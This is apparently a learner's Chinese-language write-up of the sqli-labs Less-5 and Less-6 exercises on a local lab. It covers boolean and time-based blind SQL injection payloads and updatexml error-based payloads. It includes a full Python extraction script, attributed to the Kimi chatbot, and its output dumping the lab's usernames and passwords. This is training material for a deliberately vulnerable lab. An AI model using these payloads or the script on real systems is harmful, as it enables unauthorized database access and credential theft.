note-03

sql-labs less5

输入payload

?id=1
?id=2

回显

You are in………..

You are in………..

视乎是没有回显。根据以前一点点ctf的经验，应该是布尔盲注了，没想到第五题就遇上了。

尝试构建sql注入的paylaod

?id=1’

回显

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1

推测后端语句可能为

select * from users where id='$get_id'

然后看csdn

看到两种解法，经典的是基于时间的布尔盲注，新的是基于xml报错回显的注入

布尔盲注

原理是用sql中的

and if

返回的布尔值（true,false）然后用if()设置不同的反应，根据反应来判断布尔的值来判断注入查询的数据是否存在吧

length函数用法
后端语句：
select length()； -- 返回length里的字节或字符长度

length函数：

KIMI：

MySQL：LENGTH 返回字节长度，CHAR_LENGTH 返回字符长度。
PostgreSQL：LENGTH 返回字符长度。
SQLite：LENGTH 返回字节长度。
SQL Server：LEN 返回字符长度。
Oracle：LENGTH 返回字节长度，LENGTHC 返回字符长度。

PostgreSQL/SQLite/Oracle：使用 CASE 语句。

SQL Server：使用 CASE 语句或 IF...ELSE 语句。

sql中if()语句的用法：

KIMI：

MySQL：IF(expr, true_expr, false_expr)
SELECT IF(1 > 0, 'True', 'False'); -- 返回 'True'
SELECT IF(1 < 0, 'True', 'False'); -- 返回 'False'

PostgreSQL/SQLite/Oracle：使用 CASE 语句。

SQL Server：使用 CASE 语句或 IF...ELSE 语句。  

看csdn上，可以用length根据是否有You are in………..来判断；

也能用and if sleep的时间延迟来判断；

根据前几题大概知道数据库名称为’security’为8个字符；

payload：

?id=1' and if(length(database())=8,sleep(5),1)--+  

payload的逻辑是先用length判断当前所在数据库的名字长度，

如果猜对为8，则让回显延迟5秒，此时因为使用了and，and的右边无法满足布尔值为真，所以不会有回显
什么也没有回显，说明猜测字符长度正确；

如果猜测错误，则会使得if返回1，让and的两边满足全为真，使得服务器返回‘you are in……’

其中用到了if函数和sleep函数,
sleep()函数是让回显延迟指定的时间吧；

回到payload

按照我们设置的延迟可确认确实为8个字符，也就是’security’

试了一下

id=1’ and if(length(database())=’security’,sleep(5),1)–+id=1’ and if(length(database())=’security’,sleep(5),1)–+

问了kimi，原来是length()函数只会返回整型数值，而我要用它来对比字符串😅

然后是substr()函数

SUBSTR(string, start, length)

string：原始字符串。
start：子字符串的起始位置（从 1 开始计数）。
length：要提取的子字符串的长度。

ascii()

ASCII(character_expression)

character_expression：可以是单个字符、字符串字面值或列名。该参数必须是字符类型（如 CHAR 或 VARCHAR）。

一定要转成ascii吗？
试了一下

?id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+

?id=1' and if(substr(database(),1,8)='security',sleep(5),1)--+

确实能直接猜测字符了!

如果有python脚本的话……
k：有的兄弟，有的

KIMI：

import requests
//配置
TARGET_URL = "http://localhost:32768/Less-5/"  // 目标URL
TRUE_STRING = "You are in..........."  // 数据库判断成功的响应标志
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@$!"  // 测试字符集
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
}

//发送请求
def send_payload(payload):
    url = f"{TARGET_URL}?id=1' AND {payload} --+"
    response = requests.get(url, headers=HEADERS)
    return response.text
// 获取长度
def get_length(query):
    length = 0
    while True:
        payload = f"LENGTH({query})={length}"
        response = send_payload(payload)
        if TRUE_STRING in response:
            print(f"[+] 长度为: {length}")
            return length
        length += 1
// 逐字符获取字符串
def get_string(query, length):
    result = ""
    for i in range(1, length + 1):
        print(f"[+] 获取第 {i} 个字符...")
        for char in CHARSET:
            payload = f"SUBSTR({query},{i},1)='{char}'"
            response = send_payload(payload)
            if TRUE_STRING in response:
                result += char
                print(f"[+] 当前结果: {result}")
                break
    return result

// 主函数
def main():
    // 获取数据库名
    db_length = get_length("DATABASE()")
    db_name = get_string("DATABASE()", db_length)
    print(f"[+] 数据库名: {db_name}")

    // 获取表名
    table_count = 0
    while True:
        payload = f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())={table_count}"
        response = send_payload(payload)
        if TRUE_STRING in response:
            break
        table_count += 1
    print(f"[+] 表数量: {table_count}")

    // 获取所有表名
    table_names = []
    for i in range(table_count):
        tbl_length = get_length(f"(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {i},1)")
        tbl_name = get_string(f"(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {i},1)", tbl_length)
        table_names.append(tbl_name)
        print(f"[+] 表名: {tbl_name}")

    // 获取字段名（以users表为例）
    target_table = "users"  // 替换为目标表名
    print(f"[+] 获取{target_table}表的字段...")
    field_count = 0
    while True:
        payload = f"(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='{target_table}' AND table_schema=DATABASE())={field_count}"
        response = send_payload(payload)
        if TRUE_STRING in response:
            break
        field_count += 1
    print(f"[+] 字段数量: {field_count}")

    // 获取字段名
    field_names = []
    for i in range(field_count):
        fld_length = get_length(f"(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name='{target_table}' AND table_schema=DATABASE() LIMIT {i},1)")
        fld_name = get_string(f"(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name='{target_table}' AND table_schema=DATABASE() LIMIT {i},1)", fld_length)
        field_names.append(fld_name)
        print(f"[+] 字段名: {fld_name}")

    // 获取数据
    print(f"[+] 获取{target_table}表的数据...")
    for i in range(field_count):
        if field_names[i] in ["username", "password"]:  // 获取用户名和密码字段
            print(f"[+] 获取字段: {field_names[i]}")
            data_count = 0
            while True:
                payload = f"(SELECT COUNT(*) FROM {target_table})={data_count}"
                response = send_payload(payload)
                if TRUE_STRING in response:
                    break
                data_count += 1
            print(f"[+] 数据条数: {data_count}")

            for j in range(data_count):
                data_length = get_length(f"(SELECT {field_names[i]} FROM {target_table} LIMIT {j},1)")
                data = get_string(f"(SELECT {field_names[i]} FROM {target_table} LIMIT {j},1)", data_length)
                print(f"[+] 数据[{j+1}]: {data}")

if __name__ == "__main__":
    main()

这是直接猜测字符而不猜测其ascii码的
改了一下

sr = string.printable
CHARSET = sr  //"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@$!"  // 测试字符集

因为我也不敢确定ai给出的字符是完整且编码正确的

恕我只是个脚本小子，能学懂原理先吧

运行结果

[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: s
[+] 获取第 2 个字符...
[+] 当前结果: se
[+] 获取第 3 个字符...
[+] 当前结果: sec
[+] 获取第 4 个字符...
[+] 当前结果: secu
[+] 获取第 5 个字符...
[+] 当前结果: secur
[+] 获取第 6 个字符...
[+] 当前结果: securi
[+] 获取第 7 个字符...
[+] 当前结果: securit
[+] 获取第 8 个字符...
[+] 当前结果: security
[+] 数据库名: security
[+] 表数量: 4
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: e
[+] 获取第 2 个字符...
[+] 当前结果: em
[+] 获取第 3 个字符...
[+] 当前结果: ema
[+] 获取第 4 个字符...
[+] 当前结果: emai
[+] 获取第 5 个字符...
[+] 当前结果: email
[+] 获取第 6 个字符...
[+] 当前结果: emails
[+] 表名: emails
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: r
[+] 获取第 2 个字符...
[+] 当前结果: re
[+] 获取第 3 个字符...
[+] 当前结果: ref
[+] 获取第 4 个字符...
[+] 当前结果: refe
[+] 获取第 5 个字符...
[+] 当前结果: refer
[+] 获取第 6 个字符...
[+] 当前结果: refere
[+] 获取第 7 个字符...
[+] 当前结果: referer
[+] 获取第 8 个字符...
[+] 当前结果: referers
[+] 表名: referers
[+] 长度为: 7
[+] 获取第 1 个字符...
[+] 当前结果: u
[+] 获取第 2 个字符...
[+] 当前结果: ua
[+] 获取第 3 个字符...
[+] 当前结果: uag
[+] 获取第 4 个字符...
[+] 当前结果: uage
[+] 获取第 5 个字符...
[+] 当前结果: uagen
[+] 获取第 6 个字符...
[+] 当前结果: uagent
[+] 获取第 7 个字符...
[+] 当前结果: uagents
[+] 表名: uagents
[+] 长度为: 5
[+] 获取第 1 个字符...
[+] 当前结果: u
[+] 获取第 2 个字符...
[+] 当前结果: us
[+] 获取第 3 个字符...
[+] 当前结果: use
[+] 获取第 4 个字符...
[+] 当前结果: user
[+] 获取第 5 个字符...
[+] 当前结果: users
[+] 表名: users
[+] 获取users表的字段...
[+] 字段数量: 3
[+] 长度为: 2
[+] 获取第 1 个字符...
[+] 当前结果: i
[+] 获取第 2 个字符...
[+] 当前结果: id
[+] 字段名: id
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: u
[+] 获取第 2 个字符...
[+] 当前结果: us
[+] 获取第 3 个字符...
[+] 当前结果: use
[+] 获取第 4 个字符...
[+] 当前结果: user
[+] 获取第 5 个字符...
[+] 当前结果: usern
[+] 获取第 6 个字符...
[+] 当前结果: userna
[+] 获取第 7 个字符...
[+] 当前结果: usernam
[+] 获取第 8 个字符...
[+] 当前结果: username
[+] 字段名: username
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: p
[+] 获取第 2 个字符...
[+] 当前结果: pa
[+] 获取第 3 个字符...
[+] 当前结果: pas
[+] 获取第 4 个字符...
[+] 当前结果: pass
[+] 获取第 5 个字符...
[+] 当前结果: passw
[+] 获取第 6 个字符...
[+] 当前结果: passwo
[+] 获取第 7 个字符...
[+] 当前结果: passwor
[+] 获取第 8 个字符...
[+] 当前结果: password
[+] 字段名: password
[+] 获取users表的数据...
[+] 获取字段: username
[+] 数据条数: 13
[+] 长度为: 4
[+] 获取第 1 个字符...
[+] 当前结果: d
[+] 获取第 2 个字符...
[+] 当前结果: du
[+] 获取第 3 个字符...
[+] 当前结果: dum
[+] 获取第 4 个字符...
[+] 当前结果: dumb
[+] 数据[1]: dumb
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: an
[+] 获取第 3 个字符...
[+] 当前结果: ang
[+] 获取第 4 个字符...
[+] 当前结果: ange
[+] 获取第 5 个字符...
[+] 当前结果: angel
[+] 获取第 6 个字符...
[+] 当前结果: angeli
[+] 获取第 7 个字符...
[+] 当前结果: angelin
[+] 获取第 8 个字符...
[+] 当前结果: angelina
[+] 数据[2]: angelina
[+] 长度为: 5
[+] 获取第 1 个字符...
[+] 当前结果: d
[+] 获取第 2 个字符...
[+] 当前结果: du
[+] 获取第 3 个字符...
[+] 当前结果: dum
[+] 获取第 4 个字符...
[+] 当前结果: dumm
[+] 获取第 5 个字符...
[+] 当前结果: dummy
[+] 数据[3]: dummy
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: s
[+] 获取第 2 个字符...
[+] 当前结果: se
[+] 获取第 3 个字符...
[+] 当前结果: sec
[+] 获取第 4 个字符...
[+] 当前结果: secu
[+] 获取第 5 个字符...
[+] 当前结果: secur
[+] 获取第 6 个字符...
[+] 当前结果: secure
[+] 数据[4]: secure
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: s
[+] 获取第 2 个字符...
[+] 当前结果: st
[+] 获取第 3 个字符...
[+] 当前结果: stu
[+] 获取第 4 个字符...
[+] 当前结果: stup
[+] 获取第 5 个字符...
[+] 当前结果: stupi
[+] 获取第 6 个字符...
[+] 当前结果: stupid
[+] 数据[5]: stupid
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: s
[+] 获取第 2 个字符...
[+] 当前结果: su
[+] 获取第 3 个字符...
[+] 当前结果: sup
[+] 获取第 4 个字符...
[+] 当前结果: supe
[+] 获取第 5 个字符...
[+] 当前结果: super
[+] 获取第 6 个字符...
[+] 当前结果: superm
[+] 获取第 7 个字符...
[+] 当前结果: superma
[+] 获取第 8 个字符...
[+] 当前结果: superman
[+] 数据[6]: superman
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: b
[+] 获取第 2 个字符...
[+] 当前结果: ba
[+] 获取第 3 个字符...
[+] 当前结果: bat
[+] 获取第 4 个字符...
[+] 当前结果: batm
[+] 获取第 5 个字符...
[+] 当前结果: batma
[+] 获取第 6 个字符...
[+] 当前结果: batman
[+] 数据[7]: batman
[+] 长度为: 5
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 数据[8]: admin
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin1
[+] 数据[9]: admin1
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin2
[+] 数据[10]: admin2
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin3
[+] 数据[11]: admin3
[+] 长度为: 7
[+] 获取第 1 个字符...
[+] 当前结果: d
[+] 获取第 2 个字符...
[+] 当前结果: dh
[+] 获取第 3 个字符...
[+] 当前结果: dha
[+] 获取第 4 个字符...
[+] 当前结果: dhak
[+] 获取第 5 个字符...
[+] 当前结果: dhakk
[+] 获取第 6 个字符...
[+] 当前结果: dhakka
[+] 获取第 7 个字符...
[+] 当前结果: dhakkan
[+] 数据[12]: dhakkan
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin4
[+] 数据[13]: admin4
[+] 获取字段: password
[+] 数据条数: 13
[+] 长度为: 4
[+] 获取第 1 个字符...
[+] 当前结果: d
[+] 获取第 2 个字符...
[+] 当前结果: du
[+] 获取第 3 个字符...
[+] 当前结果: dum
[+] 获取第 4 个字符...
[+] 当前结果: dumb
[+] 数据[1]: dumb
[+] 长度为: 10
[+] 获取第 1 个字符...
[+] 当前结果: i
[+] 获取第 2 个字符...
[+] 当前结果: i-
[+] 获取第 3 个字符...
[+] 当前结果: i-k
[+] 获取第 4 个字符...
[+] 当前结果: i-ki
[+] 获取第 5 个字符...
[+] 当前结果: i-kil
[+] 获取第 6 个字符...
[+] 当前结果: i-kill
[+] 获取第 7 个字符...
[+] 当前结果: i-kill-
[+] 获取第 8 个字符...
[+] 当前结果: i-kill-y
[+] 获取第 9 个字符...
[+] 当前结果: i-kill-yo
[+] 获取第 10 个字符...
[+] 当前结果: i-kill-you
[+] 数据[2]: i-kill-you
[+] 长度为: 8
[+] 获取第 1 个字符...
[+] 当前结果: p
[+] 获取第 2 个字符...
[+] 当前结果: p@
[+] 获取第 3 个字符...
[+] 当前结果: p@s
[+] 获取第 4 个字符...
[+] 当前结果: p@ss
[+] 获取第 5 个字符...
[+] 当前结果: p@ssw
[+] 获取第 6 个字符...
[+] 当前结果: p@sswo
[+] 获取第 7 个字符...
[+] 当前结果: p@sswor
[+] 获取第 8 个字符...
[+] 当前结果: p@ssword
[+] 数据[3]: p@ssword
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: c
[+] 获取第 2 个字符...
[+] 当前结果: cr
[+] 获取第 3 个字符...
[+] 当前结果: cra
[+] 获取第 4 个字符...
[+] 当前结果: crap
[+] 获取第 5 个字符...
[+] 当前结果: crapp
[+] 获取第 6 个字符...
[+] 当前结果: crappy
[+] 数据[4]: crappy
[+] 长度为: 9
[+] 获取第 1 个字符...
[+] 当前结果: s
[+] 获取第 2 个字符...
[+] 当前结果: st
[+] 获取第 3 个字符...
[+] 当前结果: stu
[+] 获取第 4 个字符...
[+] 当前结果: stup
[+] 获取第 5 个字符...
[+] 当前结果: stupi
[+] 获取第 6 个字符...
[+] 当前结果: stupid
[+] 获取第 7 个字符...
[+] 当前结果: stupidi
[+] 获取第 8 个字符...
[+] 当前结果: stupidit
[+] 获取第 9 个字符...
[+] 当前结果: stupidity
[+] 数据[5]: stupidity
[+] 长度为: 7
[+] 获取第 1 个字符...
[+] 当前结果: g
[+] 获取第 2 个字符...
[+] 当前结果: ge
[+] 获取第 3 个字符...
[+] 当前结果: gen
[+] 获取第 4 个字符...
[+] 当前结果: geni
[+] 获取第 5 个字符...
[+] 当前结果: genio
[+] 获取第 6 个字符...
[+] 当前结果: geniou
[+] 获取第 7 个字符...
[+] 当前结果: genious
[+] 数据[6]: genious
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: m
[+] 获取第 2 个字符...
[+] 当前结果: mo
[+] 获取第 3 个字符...
[+] 当前结果: mob
[+] 获取第 4 个字符...
[+] 当前结果: mob!
[+] 获取第 5 个字符...
[+] 当前结果: mob!l
[+] 获取第 6 个字符...
[+] 当前结果: mob!le
[+] 数据[7]: mob!le
[+] 长度为: 5
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 数据[8]: admin
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin1
[+] 数据[9]: admin1
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin2
[+] 数据[10]: admin2
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin3
[+] 数据[11]: admin3
[+] 长度为: 5
[+] 获取第 1 个字符...
[+] 当前结果: d
[+] 获取第 2 个字符...
[+] 当前结果: du
[+] 获取第 3 个字符...
[+] 当前结果: dum
[+] 获取第 4 个字符...
[+] 当前结果: dumb
[+] 获取第 5 个字符...
[+] 当前结果: dumbo
[+] 数据[12]: dumbo
[+] 长度为: 6
[+] 获取第 1 个字符...
[+] 当前结果: a
[+] 获取第 2 个字符...
[+] 当前结果: ad
[+] 获取第 3 个字符...
[+] 当前结果: adm
[+] 获取第 4 个字符...
[+] 当前结果: admi
[+] 获取第 5 个字符...
[+] 当前结果: admin
[+] 获取第 6 个字符...
[+] 当前结果: admin4
[+] 数据[13]: admin4

bp盲注爆破

csdn上看到可以直接不用写脚本直接用bp看返回长度来爆破的
看来也可以不用if函数来构造payload

?id=1'and substr(database(),1,1) ='s'--+

能达到同样效果

bp爆破的话payload设置的前后和循序有点难搞，但是原理知道了可以一次一次慢慢试；

xml报错注入

前提是在有sql报错信息输出的前提下（存在print_r(mysql_error())函数）

在高版本MySQL（5.1）中添加了对xml文档进行查询和修改的函数

update函数：

UPDATEXML(xml_target, xpath_expr, new_xml)

xml_target：要更新的XML文档。
xpath_expr：XPath表达式，用于定位需要更新的节点。
new_xml：新的XML片段或值，用于替换目标节点的值。

extractvalue函数：

EXTRACTVALUE(xml_target, xpath_expr)

原理是用xpath的非法字符报错
KIMI：

updatexml()和extractvalue()函数在处理XML数据时，会使用XPath表达式来定位或提取节点。如果XPath表达式不符合语法规范，MySQL会返回错误信息。攻击者可以利用这一特性，通过拼接恶意的XPath表达式，使数据库报错，并在错误信息中泄露敏感数据。

流程：

1.判断闭合点
2.判断是否存在xml报错注入：
使用updatexml

?id=1' and updatexml(1,0x7e,1) --+
0x7e 是 ~ 的16进制表示，用来进行绕过，字符串替换成十六进制数有一定的绕过作用

成功回显

XPATH syntax error: ‘~’

说明存在报错注入

?id=1' and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1) --+

爆库名

note

concat和group_concat有什么区别,问了kimi，
我总结就是concat用来拼接字符串，group_concat用来拼接表中的内容

然后就是走注入流程

爆表名

?id=1'and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1)--+

XPATH syntax error: ‘emails,referers,uagents,users‘

爆字段

?id=1'and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users'),0x7e),1)--+

XPATH syntax error: ‘id,username,password‘

爆表

http://localhost:32768/Less-5/?id=1%27and%20updatexml(1,concat(0x7e,(select%20group_concat(id,username,password)from%20users),0x7e),1)--+

XPATH syntax error: ‘~1DumbDumb,2AngelinaI-kill-you,3’

发现回显不完全，听说xpath报错有长度限制，改为：

?id=1'and updatexml(1,concat(0x7e,(select group_concat(id,username,password)from users limit 0,1),0x7e),1)--+

发现limit的值改变了依然没结果，看了眼csdn，发现group_concat要改为concat，
问了kimi，limit是限制输出的行在哪，如(0,1)就会限制为从第一行开始提取一列，但是用group_concat，会将一整个表整合为一行，限制就没用了。

最后payload改为

?id=1'and updatexml(1,concat(0x7e,(select concat(id,username,password) from users limit 0,1),0x7e),1)--+

成功，只要一条条爆出users表中内容就行了。

# sql-labs less6

和less5原理一样

select * from users where id=”$get_id”

闭合payload改为

?id=1”

即可